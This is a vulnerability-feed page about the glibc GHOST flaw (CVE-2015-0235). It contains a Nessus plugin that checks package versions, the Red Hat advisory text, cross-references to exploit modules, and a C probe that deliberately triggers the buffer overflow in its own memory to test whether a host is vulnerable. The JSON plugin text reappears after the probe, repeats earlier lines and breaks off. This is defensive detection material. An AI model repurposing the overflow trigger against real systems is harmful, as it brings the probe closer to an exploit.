(rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", 
reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 7, "lastseen": "2018-09-09T16:05:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", 
"cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "907d5d6251dbbdb77a799cb2f6abed86e3ac78246d5794fc363e2f07c3323b85", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "34300f4f1f032d3872fb6c361a5e32b1", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-11-13T16:59:52", "modified": "2018-11-10T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", 
reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", 
CVSS v2 base score recorded for CVE-2015-0235 in this feed: 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE). Note that the plugin itself sets script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"), i.e. it rates access complexity High where the feed's vector says Low; the two vectors for the same flaw differ only in that metric.

Related entries for CVE-2015-0235 (cross-references recorded on this page, grouped by source feed):
amazon: ALAS-2015-473, ALAS-2015-493
ics: ICSA-15-064-01A
thn: THN:ACBFC80659E47A5B7C81B99570749679, THN:3DD8F9ADFFEB290F33825414D41B0F41, THN:A649F4ABCE9B99052139693A13D95B14
cert: VU:967332
metasploit: MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF, MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER
f5: SOL16057, F5:K16057
freebsd: 0765DE84-A6C1-11E4-A0C1-C485083CA99C, F7A9E415-BDCA-11E4-970C-000C292EE6B8
openvas: OPENVAS:1361412562310871307, OPENVAS:1361412562310123196, OPENVAS:1361412562310120286, OPENVAS:1361412562310850839, OPENVAS:1361412562310850633, OPENVAS:1361412562310105188, OPENVAS:1361412562310882109, OPENVAS:1361412562310123197, OPENVAS:1361412562310882108, OPENVAS:1361412562310882107
suse: OPENSUSE-SU-2015:0184-1, OPENSUSE-SU-2015:0162-1, SUSE-SU-2015:0158-1
packetstorm: PACKETSTORM:130171, PACKETSTORM:130974, PACKETSTORM:130115
ubuntu: USN-2485-1
seebug: SSV:89237
vulnerlab: VULNERLAB:1430
slackware: SSA-2015-028-01
cisco: CISCO-SA-20150128-GHOST
nessus: REDHAT-RHSA-2015-0092.NASL, ORACLELINUX_ELSA-2015-0090.NASL, REDHAT-RHSA-2015-0090.NASL, ORACLELINUX_ELSA-2015-0092.NASL, FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL, SLACKWARE_SSA_2015-028-01.NASL, F5_BIGIP_SOL16057.NASL, ALA_ALAS-2015-473.NASL, MANDRIVA_MDVSA-2015-039.NASL, CISCO_CUCM_CSCUS66650-GHOST.NASL
redhat: RHSA-2015:0092, RHSA-2015:0101, RHSA-2015:0090, RHSA-2015:0099
exploitdb: EDB-ID:36421, EDB-ID:35951
centos: CESA-2015:0092, CESA-2015:0090
securityvulns: SECURITYVULNS:VULN:14240, SECURITYVULNS:DOC:31672
oraclelinux: ELSA-2015-0090, ELSA-2015-1627, ELSA-2015-0101
lenovo: LENOVO:PS500043-NOSID
zdt: 1337DAY-ID-23215, 1337DAY-ID-23392
threatpost: THREATPOST:3A858BD40E6943BD3F4553301036091D, THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8
paloalto: PAN-SA-2015-0002
debian: DEBIAN:DLA-139-1:5734D
cloudfoundry: CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2
cve: CVE-2015-0235
huawei: HUAWEI-SA-20150226-01-GLIBC
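The package check trusts the RPM database; the complement a practitioner wants, for a statically linked program, a container image, or a glibc that was not installed from RPM, is a check of the resolver's actual behaviour. The C program below is an added example modelled on the canary test Qualys published with its advisory; it is not part of the Tenable plugin or the Red Hat erratum. It hands gethostbyname_r() a buffer sized so that the unpatched __nss_hostname_digits_dots() writes one pointer past the space it accounted for, and reports whether a canary placed directly after the buffer survives. The all-digit name takes the numeric fast path, so nothing is sent to DNS. The canary string, buffer size and the tri-state return convention are this example's own choices; a return of -1 (neither ERANGE nor a clobbered canary) means the libc in use does not behave like glibc here and the probe is inconclusive, not that the host is safe.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#ifndef __USE_MISC
/* glibc declares gethostbyname_r() only outside strict-ISO mode */
int gethostbyname_r(const char *, struct hostent *, char *, size_t,
                    struct hostent **, int *);
#endif

#define CANARY "in_the_coal_mine"   /* constructed marker, any fixed string works */

/* The result buffer handed to gethostbyname_r(), immediately followed by a
 * canary so that a write past the size the resolver accounted for is visible. */
static struct {
    char buffer[1024];
    char canary[sizeof CANARY];
} probe;

/* Returns 1 if the canary was overwritten (unpatched __nss_hostname_digits_dots),
 * 0 if the resolver rejected the request with ERANGE (patched size check),
 * -1 for any other outcome (e.g. a non-glibc libc), which is inconclusive. */
int ghost_probe(void)
{
    struct hostent resbuf, *result = NULL;
    int herrno = 0;

    memset(probe.buffer, 0, sizeof probe.buffer);
    memcpy(probe.canary, CANARY, sizeof CANARY);

    /* All-digit name: takes the digits-and-dots fast path, so no DNS traffic.
     * Length chosen so that the pre-fix accounting
     *   sizeof(host_addr)=16 + sizeof(h_addr_ptrs)=2 pointers + strlen(name) + 1
     * exactly fills the buffer; the unpatched code then still stores the
     * h_alias_ptr it forgot to count, overrunning into the canary, while the
     * patched check (which adds sizeof(*h_alias_ptr)) fails with ERANGE. */
    size_t len = sizeof probe.buffer - 16 - 2 * sizeof(char *) - 1;
    char name[sizeof probe.buffer];
    memset(name, '0', len);
    name[len] = '\0';

    int rc = gethostbyname_r(name, &resbuf, probe.buffer, sizeof probe.buffer,
                             &result, &herrno);

    if (memcmp(probe.canary, CANARY, sizeof CANARY) != 0)
        return 1;
    if (rc == ERANGE)
        return 0;
    return -1;
}

int main(void)
{
    int r = ghost_probe();
    puts(r == 1 ? "vulnerable" : r == 0 ? "not vulnerable" : "inconclusive");
    return r == 1;
}
```

Build it with cc -o ghost_probe ghost_probe.c and run it on the host under test; the exit status is 1 only when the canary was overwritten. Because the overrun lands inside the probe struct, the test observes the bug without corrupting heap metadata, which is what makes it safe to run on production hosts. Note that a process that was already running when glibc was updated still maps the old library, so after applying RHSA-2015:0099 the long-lived services (nscd among them) need a restart for this probe, or the patched code, to apply to them.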
reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", 
